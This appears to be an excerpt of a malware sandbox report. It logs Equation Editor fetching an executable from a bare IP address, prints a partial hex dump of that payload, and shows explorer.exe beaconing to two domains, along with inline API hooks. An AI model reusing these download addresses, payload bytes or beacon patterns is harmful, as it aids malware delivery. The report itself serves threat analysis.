                                        Nov 25, 2021 19:23:25.573982000 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.573983908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574019909 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574023962 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574059963 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574062109 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574100018 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574103117 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574137926 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574139118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574178934 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574178934 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574217081 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.574218988 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.574255943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.575361967 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.575401068 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.575434923 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.575442076 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.575453997 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.575480938 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.575481892 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.575522900 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.576373100 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.576414108 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.576431036 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.576459885 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.576983929 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.577029943 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.577068090 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.577081919 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.577102900 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.577867985 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.577908039 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.577914953 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.577953100 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578382969 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578404903 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578425884 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578428984 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578444004 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578448057 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578468084 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578469038 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578485966 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578491926 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578512907 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578514099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578527927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578532934 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.578548908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.578572035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579324961 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579348087 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579366922 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579387903 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579391956 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579408884 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579410076 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579430103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579431057 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579451084 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579453945 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579473972 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579490900 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579494953 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579513073 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579516888 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579531908 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579538107 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579555035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579560995 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579577923 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579581976 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579600096 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579602957 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579623938 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579624891 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579641104 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579648018 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579662085 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579668999 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579689026 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579690933 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579713106 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579714060 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579730988 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579735994 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579751015 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579758883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579773903 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579777956 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579798937 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579798937 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579818964 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579819918 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:25.579837084 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.579858065 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.593389988 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:25.594378948 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:26.511722088 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:24:42.525271893 CET4916680192.168.2.22104.21.82.75
                                        Nov 25, 2021 19:24:42.542876959 CET8049166104.21.82.75192.168.2.22
                                        Nov 25, 2021 19:24:42.543006897 CET4916680192.168.2.22104.21.82.75
                                        Nov 25, 2021 19:24:42.574367046 CET4916680192.168.2.22104.21.82.75
                                        Nov 25, 2021 19:24:42.592082977 CET8049166104.21.82.75192.168.2.22
                                        Nov 25, 2021 19:24:42.622097015 CET8049166104.21.82.75192.168.2.22
                                        Nov 25, 2021 19:24:42.622149944 CET8049166104.21.82.75192.168.2.22
                                        Nov 25, 2021 19:24:42.622379065 CET4916680192.168.2.22104.21.82.75
                                        Nov 25, 2021 19:24:42.653606892 CET4916680192.168.2.22104.21.82.75
                                        Nov 25, 2021 19:24:42.671204090 CET8049166104.21.82.75192.168.2.22
                                        Nov 25, 2021 19:25:03.037218094 CET4916880192.168.2.2234.246.239.131
                                        Nov 25, 2021 19:25:03.083914042 CET804916834.246.239.131192.168.2.22
                                        Nov 25, 2021 19:25:03.084011078 CET4916880192.168.2.2234.246.239.131
                                        Nov 25, 2021 19:25:03.084229946 CET4916880192.168.2.2234.246.239.131
                                        Nov 25, 2021 19:25:03.131243944 CET804916834.246.239.131192.168.2.22
                                        Nov 25, 2021 19:25:03.131290913 CET804916834.246.239.131192.168.2.22
                                        Nov 25, 2021 19:25:03.131323099 CET804916834.246.239.131192.168.2.22
                                        Nov 25, 2021 19:25:03.131522894 CET4916880192.168.2.2234.246.239.131
                                        Nov 25, 2021 19:25:03.131582022 CET4916880192.168.2.2234.246.239.131
                                        Nov 25, 2021 19:25:03.177926064 CET804916834.246.239.131192.168.2.22

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 25, 2021 19:24:41.533070087 CET5216753192.168.2.228.8.8.8
                                        Nov 25, 2021 19:24:41.570363998 CET53521678.8.8.8192.168.2.22
                                        Nov 25, 2021 19:25:02.965919971 CET5059153192.168.2.228.8.8.8
                                        Nov 25, 2021 19:25:03.035269022 CET53505918.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Nov 25, 2021 19:24:41.533070087 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.oojry.xyzA (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:02.965919971 CET192.168.2.228.8.8.80xc18cStandard query (0)www.crystalsbyzoe.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Nov 25, 2021 19:24:41.570363998 CET8.8.8.8192.168.2.220x8eb8No error (0)www.oojry.xyz104.21.82.75A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:24:41.570363998 CET8.8.8.8192.168.2.220x8eb8No error (0)www.oojry.xyz172.67.198.90A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)www.crystalsbyzoe.comweb.jimdosite.comCNAME (Canonical name)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)web.jimdosite.comdolphin-renderserve-prod.jimdo-platform.netCNAME (Canonical name)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-renderserve-prod.jimdo-platform.netdolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com34.246.239.131A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.208.193.50A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com54.154.18.62A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.17.6.255A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.210.254.88A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com54.171.119.91A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com52.209.227.237A (IP address)IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET8.8.8.8192.168.2.220xc18cNo error (0)dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com54.73.207.172A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 103.171.1.140
                                        • www.oojry.xyz
                                        • www.crystalsbyzoe.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249165103.171.1.14080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        Nov 25, 2021 19:23:23.232670069 CET0OUTGET /384500000_1/.vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 103.171.1.140
                                        Connection: Keep-Alive
                                        Nov 25, 2021 19:23:23.525060892 CET1INHTTP/1.1 200 OK
                                        Date: Thu, 25 Nov 2021 18:23:23 GMT
                                        Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                        Last-Modified: Thu, 25 Nov 2021 04:13:29 GMT
                                        ETag: "7431e-5d195326272a0"
                                        Accept-Ranges: bytes
                                        Content-Length: 475934
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 70 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 70 a0 02 00 00 70 03 00 00 a2 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELH\0p@ tppp.texth[\ `.rdatap`@@.dataX\t@.ndata.rsrcppx@@
                                        Nov 25, 2021 19:23:23.525137901 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 eb 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 70 eb 42 00 8d 45 a4
                                        Data Ascii: U\}t+}FEuHhBHPuuuHr@BSV5pBEWPuLr@eEEPuPr@}eDp@FRVVU+MM3FQNUMVTUFPEEPMHp@EEPEPu
                                        Nov 25, 2021 19:23:23.525193930 CET4INData Raw: 20 ec 42 00 89 88 e0 eb 42 00 e9 44 13 00 00 8b 45 e4 8d 34 85 e0 eb 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e8 8b 44 85 dc 89 0e e9 2e 13 00 00 ff 34 95 e0 eb 42 00 56 e9 be 12 00 00 8b 0d 30 e3 42 00 8b 35 60 72 40 00 3b cb 74 07 52 51 ff d6 8b
                                        Data Ascii: BBDE4B3;#MD.4BV0B5`r@;tRQEDB;PQjLuPp@j.W>;tBj\Vy>SWEp@u|p@=uWxp@uEEF:u9]tjWhHC
                                        Nov 25, 2021 19:23:23.525247097 CET6INData Raw: 63 0f 00 00 8b c8 8b 45 e8 83 f8 0c 77 6d ff 24 85 97 29 40 00 03 f9 eb 62 2b f9 eb 5e 0f af cf 8b f9 eb 57 3b cb 74 42 8b c7 99 f7 f9 8b f8 eb 4a 0b f9 eb 46 23 f9 eb 42 33 f9 eb 3e 33 c0 3b fb 0f 94 c0 eb e7 3b fb 75 0e eb 08 33 ff eb 2b 3b fb
                                        Data Ascii: cEwm$)@b+^W;tBJF#B3>3;;u3+;t;t3G;t3EW|jjPWVr@wE=x@;tDH;?;u;x@WV=x@PW=x@VPL
                                        Nov 25, 2021 19:23:23.816823959 CET7INData Raw: 14 71 40 00 8b f0 3b f3 74 3d 39 5d e4 89 5d fc 74 17 ff 75 e4 e8 6b f4 ff ff ff d6 85 c0 74 31 c7 45 fc 01 00 00 00 eb 28 68 00 90 40 00 68 78 af 40 00 68 00 f0 42 00 68 00 04 00 00 ff 75 cc ff d6 83 c4 14 eb 0a ff 75 08 6a f7 e8 da 2c 00 00 39
                                        Data Ascii: q@;t=9]]tukt1E(h@hx@hBhuuj,9]Wq@yjKjDjjEjjEjEEVEB4uj!EPht@jSht@r@;EURht@P;E
                                        Nov 25, 2021 19:23:23.816953897 CET8INData Raw: 01 00 00 8d 4d 08 53 51 50 68 78 9f 40 00 56 e8 b6 33 00 00 50 ff 15 28 71 40 00 e9 ae f0 ff ff 6a 02 89 5d d4 e8 c9 04 00 00 83 f8 01 89 45 cc 0f 8c 6f 03 00 00 b9 ff 03 00 00 3b c1 7e 03 89 4d cc 38 1e 0f 84 8e 00 00 00 56 88 5d 0b e8 77 33 00
                                        Data Ascii: MSQPhx@V3P(q@j]Eo;~M8V]w39]E~}uESPEjPu,q@te}u_9]u!}t+}t%E>F:Et@;u|9EPW3E8Et<t<u>FjSju4q@u>;8uSj
                                        Nov 25, 2021 19:23:23.817406893 CET10INData Raw: 2f 00 00 85 f6 8b f8 7d 06 57 e8 68 31 00 00 8b c7 5f 5e c2 04 00 55 8b ec 81 ec 0c 01 00 00 53 56 8d 45 fc 57 50 a1 10 ec 42 00 0c 08 33 db 50 53 ff 75 0c ff 75 08 ff 15 10 70 40 00 3b c3 75 69 8b 35 08 70 40 00 bf 05 01 00 00 eb 19 39 5d 10 75
                                        Data Ascii: /}Wh1_^USVEWPB3PSuup@;ui5p@9]uKSPuuWPSutup@j1;t$S5Buuup@3@_^[9Buuup@uD$uBUEPBEPjj
                                        Nov 25, 2021 19:23:23.817466021 CET11INData Raw: c0 af 40 00 2b f7 ff d3 f6 05 14 ec 42 00 01 8b f8 74 43 2b 45 f0 3d c8 00 00 00 77 06 83 7d 14 00 75 33 8b 45 08 ff 75 08 2b 45 14 6a 64 50 ff 15 30 71 40 00 50 8d 45 a8 68 18 91 40 00 50 ff 15 00 72 40 00 83 c4 0c 8d 45 a8 50 6a 00 e8 2a 1d 00
                                        Data Ascii: @+BtC+E=w}u3Eu+EjdP0q@PEh@Pr@EPj*}3;t?9Eu PEPVuu(q@t39uu.u@u)uE}?u9EjjjtS9u}uVWYuHjXIu9u}uKAVW9tEjPVWu(
                                        Nov 25, 2021 19:23:23.817522049 CET13INData Raw: 00 00 c3 83 ec 14 53 55 56 8b 35 70 eb 42 00 57 6a 06 e8 ac 27 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 50 43 00 e8 d6 23 00 00 eb 4a bf d8 9f 42 00 53 57 53 68 e4 72 40 00 68 01 00 00 80 c7 05 00 50 43 00 30 78 00 00 e8 3c 23 00 00 38 1d
                                        Data Ascii: SUV5pBWj'3;tPhPC#JBSWShr@hPC0x<#8BuSWhs@hr@h#WhPCH$9xBDC UBNH;tzVLBBSWRQvD"B:tT<"uBj"WW#D8;v&h@P
                                        Nov 25, 2021 19:23:23.817578077 CET14INData Raw: 00 33 ed 8b f1 c1 e6 06 03 35 80 eb 42 00 3b cd 7c 3e 83 f8 01 75 31 55 ff 76 10 e8 a9 d9 ff ff 85 c0 74 24 6a 01 55 68 0f 04 00 00 ff 35 38 e3 42 00 ff 15 44 72 40 00 33 c0 39 2d 2c e3 42 00 0f 94 c0 e9 a4 02 00 00 39 2e 0f 84 9a 02 00 00 68 0b
                                        Data Ascii: 35B;|>u1Uvt$jUh58BDr@39-,B9.hB@@;Buj9-,BB9@v$^hhCv hWdvhWVv(hWHjW,r@9-BD$,tf
                                        Nov 25, 2021 19:23:23.817631960 CET16INData Raw: 6a 00 68 43 04 00 00 53 ff d6 68 00 00 01 04 6a 00 68 45 04 00 00 53 ff d6 83 25 9c 8f 42 00 00 57 e8 21 1a 00 00 50 6a 00 68 35 04 00 00 53 ff d6 8d 45 f4 50 ff 75 14 68 49 04 00 00 53 ff d6 83 25 b8 9f 42 00 00 33 c0 e9 61 01 00 00 81 7d 0c 11
                                        Data Ascii: jhCShjhES%BW!Pjh5SEPuhIS%B3a},r@5Dr@uZEf.39B By PPhhuPPM}Nhu}uruiOWM+


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.2249166104.21.82.7580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 25, 2021 19:24:42.574367046 CET504OUTGET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1
                                        Host: www.oojry.xyz
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 25, 2021 19:24:42.622097015 CET505INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 25 Nov 2021 18:24:42 GMT
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=3600
                                        Expires: Thu, 25 Nov 2021 19:24:42 GMT
                                        Location: https://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1f333Q7YxD9wZSdpuenGrz6d%2BGjRyyIm1tuxT%2BmFwQn0h72Dl79IkVH%2B2MFqfwt%2BkF0341pcYMNFuzeGGAi1cxsJc0u8Oz4ZTU4mQjgTypazhHcndvPmTWMV6NDjvpE9"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 6b3cea5a2864702e-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.224916834.246.239.13180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 25, 2021 19:25:03.084229946 CET506OUTGET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1
                                        Host: www.crystalsbyzoe.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 25, 2021 19:25:03.131290913 CET506INHTTP/1.1 403 Forbidden
                                        Content-Type: text/html
                                        Date: Thu, 25 Nov 2021 18:25:03 GMT
                                        Server: nginx
                                        Vary: Accept-Encoding
                                        Content-Length: 159
                                        Connection: Close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

